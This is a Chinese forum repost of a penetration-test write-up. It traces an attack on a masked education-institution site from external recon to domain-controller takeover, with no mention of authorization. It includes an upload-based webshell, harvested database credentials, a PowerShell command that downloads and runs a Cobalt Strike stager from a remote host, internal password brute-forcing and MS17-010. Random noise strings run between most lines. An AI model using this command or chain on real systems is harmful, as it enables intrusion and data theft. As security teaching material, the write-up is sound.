|
& N4 f3 r% g" n9 r+ ?% S 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
5 S g. `/ G- ~4 _8 ]; c# F ' Y7 x( z1 Z4 u. j" j. q. e
# g' k6 @1 i7 T$ _2 N
% _1 v% o& D5 d' w ) c2 @) K2 s0 V) Y, Q; G0 K
" I6 P9 r; u7 @' E& z5 Y+ F% L
正文4 E- T0 \% _1 T) M" F D8 \
4 e; J3 H) B& O" b t1 q4 T
t8 M& {" L6 w* D+ M6 d ) E- x) x- A% {/ f* P( T
2 @$ N- F/ Z; N2 u& ~
2 I( W+ G' H0 O1 Z( M3 U 目标:www.xxxx.com(一家教育机构)
4 h1 }% w; w! p% _ a
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能2 ]2 d/ x9 t( ?& s. Y& |! |0 m
$ Z* \+ w z5 S* V5 `1 b5 [! Q, }* R' N: w
* Q" j) N% ]* x
+ H. Z! B8 _9 O% `6 D/ u2 L. s0 L0 p1 Z1 F7 w0 I
进行了简单的信息搜集
. Q& B4 v; n7 h. H2 O, }
) s& ?" W/ N! r! _: T- ]) g! y
H2 U( l7 q! I0 ?5 j* c$ w 2 r7 g3 t0 X2 |. A& H4 \
0 i5 P$ f, M( P2 l; ]$ y4 j
子域名搜集
x) \ Q4 v ^4 E2 o 1 |5 x5 g) b, S& w) J
7 J. j: x: S- A' ~* i9 g  + P5 { I# A/ i+ R d
0 X7 j2 w1 H9 y
- |- g) t, l0 Y k/ Y' L) K, ` R
fofa找资产
5 L3 |* E+ D" O
1 s( j G2 }5 p* \
) T; r7 k# S9 m( [/ z
$ z8 _$ r1 i$ m# K$ G0 t ]
; U/ K; g, O# D& X  ! q. ]9 W# V% h. ]# ]
7 w$ L. F; K5 d$ V& M# ?
9 ]4 g- W) `* y' _& \! w 一共七个资产。去重之后只有两个。
* a& X) g' Q$ e/ P
, o# U* [) k( r; g$ o5 }2 G/ |2 X
" v" z/ Z9 K9 R
) W/ Z q0 ?0 y2 X9 i
目录探测9 d% N5 `) P, b3 h2 K5 o
0 X& K& ^# ?4 ~! G5 v, F/ {: ?4 J$ q& K( n6 Z2 O# F
 2 @( w" t6 a) g
7 B4 G" Z# V& u# ^! Q, \
8 I" q: O4 m6 [7 Q7 z" j8 H1 c 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
0 D! q4 ^! B0 z2 W* C2 [0 \) x
6 [1 \$ s- c w& Q+ Z
( G5 D2 ~; Z. I. H9 w- F
7 p0 p$ L) a) ^0 X6 J! ? g3 l9 `0 [& Y
我又尝试了通过修改返回包来绕过登录界面 x R; J, ^9 K, K o: B: F% j
" H8 h; M- M# @9 Z" `/ m. ?4 T
7 x8 U5 r4 o4 v1 f* U8 x/ P 
6 F) J4 E) p8 B
3 h" ?, G2 a+ c+ V, r* ^( ~- M6 o
还是不行,尝试注入无果
; l4 o- g0 I; u/ l. }5 c 2 \$ o" q) _; u, O
& ^8 {4 P) n. g' b. E3 C
 8 w: L# _2 @& v4 o! ~$ l% N
' A. x6 J9 I U4 ?: c0 D- m
( n- S' X' l2 O( H 不过我目录探测出了一处Spring信息泄露
+ E, R9 W/ X, G, s
& T& I) X b, }3 @; p6 i6 I
9 o/ V3 h1 u0 ^! E0 \0 e 0 Q. I* S0 b9 ?
# B2 y: _: b. p3 ]  " [) O9 b& f$ c7 n% }
; e3 A5 ~) z% n! r, z1 o
' d6 J1 F; C( n1 {# E
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
$ V- R9 [- j: p) S6 t 8 { w0 `8 I3 p' }3 b
$ l2 g$ l f2 e! c1 K
7 A: R$ j0 X: M9 E3 \% T3 v# L3 S* ^ 4 }; w- M# o, K
- L& [! V: d' [4 N4 O( L! q& O- B
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
% J& \6 j X6 D2 P8 [ " m: x( R4 G3 i: t# `
/ ]! w) @4 c- e 
! D7 M B/ r+ F% s+ t; b1 {2 h
; E4 c9 M- N0 u2 k6 o
' j$ ~; \3 s$ m$ {% q" f 获取有些师傅到这一步就手机抓包电脑测了。
- [# N0 Q; i7 ^' c 0 g/ ]( K( @* }
, X$ z- v& F, }2 N1 h) p- @
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
" B) } W0 Q, x+ s; j' C1 R; c + r) b4 i$ l6 N: X2 H7 z' B
1 o8 x: N* @5 n. c" [- q 其中在一个公众号发现了小程序,可以进行注册。
6 o* N+ o0 O! b' u9 u9 X) `
P4 m' j8 z+ W: D+ c/ t, n$ {7 [5 D$ ?
看到了头像上传,尝试上传获取WebShell) n7 c0 R y: O
- {; G9 s; \$ V# `( W; Y& F4 {: ^" D% Z5 y" C9 Z
+ X0 E" ]* m; C1 { ( N2 w p q c$ [( ^$ @' {
. b5 m( z2 a7 p1 ~. @: J 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问: ` v1 }! g! d0 q; ~0 |
" ^ n& G# t' J+ V$ c! e/ T! x- Q J* J( v. {. m
 1 `! l2 g2 F4 s' G0 N) L
0 h- X# Q" v# T8 P1 | g% N" g+ S$ l+ _+ r
然后上了大马
. J. |1 |. `5 S Z6 N- O 3 M0 Q3 Q( r6 a
* u" D4 M, y- D# s' l
1 v* Y4 z% n( j0 d / G1 P$ g) a2 e7 u4 |
& }% p/ T! b) j, J, [% w; ?4 w
9 y4 W! t! U, B6 B. O) ?
- Y% d- B+ T1 O3 U1 M4 J
+ ?# b; j: k# M7 e) Y! k 通过翻找文件发现数据库账号密码5 A0 V: o8 M+ X
. s, I4 E+ {2 S& _! B) x* }# P
# @: z6 ~& h: M  % l! U( e! F! M- a5 W
+ g) W. N+ c# \' ` j1 F8 o. m. _9 p& d1 I# z' D
--内网渗透8 p* u4 T% a7 a0 B
, |* ^. C b e! c; u( W- h7 \! R5 ]' a+ D! y8 U' T
直接通过powershell执行 cs上线
; ^6 {" `" b+ O& c7 g1 L
0 U+ X3 B2 f1 s- A) h8 l z& s& H) Z( \0 J j& S- g! j( {" n
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
# y" D/ N( \4 e6 E( O' F9 o
; w( f/ F9 J z
6 b/ [% q( A' n8 U. g3 U  * I* g9 |; ~& Q) V3 x3 m
F: \9 g$ s9 w e/ H
. U- n3 P4 }# X8 ^& t 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
0 }2 j0 J% ` q) o+ k) `
8 b2 t, i5 G8 g' L: {. x; I
& b' n+ Q2 P& \+ \  % ^3 Y/ m, d4 [1 [3 F; w2 k3 b
4 C7 o1 U4 c4 I" J2 j) |' L" J2 @. L* `6 C
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
# n8 X0 y5 L# a; j5 f+ X9 Y g% K7 ]
% y [5 l; J4 q+ [2 e2 M0 p l$ Q' u3 a
: W0 g. }1 i8 {6 T
9 y% Z* D- N V9 J/ Y& q. I/ v k% r
0 S* S7 Z+ r3 u1 t0 M% w- j; W
4 \# h3 d, a7 h' q. W# V5 c4 o8 J 
0 t2 ?2 |. ?& \6 ~
6 I; D3 O1 }# d8 u+ ~. v$ M# U/ b% E: |
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
$ Z1 D5 N$ N0 r) R s7 Q& F" z
& Z2 ` E* p: t9 X" ^/ U* |" `
" {" O6 r" p! C* _/ e0 r - J- a0 a5 z5 _
' G0 H# [* r8 ^6 X v" J) `
 ; F0 K! o% o8 K7 j
7 B7 j) _7 A4 B. a- x# A) o9 n+ |
* ~" [8 {! F- ?& t: z* z6 z
, E- ~1 w B# c0 Y& A! C
F/ U% b' N3 d/ k" _4 t. t% H) l! \6 _: D$ k
# b1 g$ _2 q) e& z; r: P; ]8 ^: f' a8 `% s$ i2 A9 E: E
" T9 }4 g4 |. k& T, ~! R* k
# ^0 `, L4 `1 s% B6 I
4 i% j" o1 M. g% z0 D 小结9 `+ ~4 o+ q' S7 x z
2 F7 F0 W) G2 ]3 @/ q
% o0 _, J$ s5 K* S/ A- N
7 w1 @: R& V1 `/ ?* }
]0 W& S. d0 T/ N% f& B+ |: A8 Y+ p. S8 n
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
% I8 Q' t3 K% k# }, Z, b 8 Z( P$ |) N0 ?5 W
4 Z9 u1 {8 u" f( {# r1 A & ~! z$ w4 W4 J7 k9 l4 E" C
% |' P" H3 U1 p$ x
0 y; W2 `( k/ t; O- x# m* ~ - ! [2 P: h4 w( c8 ^& J, W
1 c5 ~; l6 ]( a! b& R8 k1 I( V
n# h$ M+ t/ w& [: [ -
0 c$ A4 `7 V+ a ' Y" F+ f# E: H* o3 A- G( ~% @! Q
; [2 a: h' Q* d( ^
3 [* ^" y S( k! b; C
: X# ?; x1 I# x) Z2 H) Y 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
4 L- W7 R+ y9 ? r ! O g5 E% U8 H/ z# [
) I# Q+ s& f6 b4 U5 `
' S/ I4 K# |. z; C3 E2 Q' C1 V | 
发表于 2024-3-1 19:41:32
收藏
支持
反对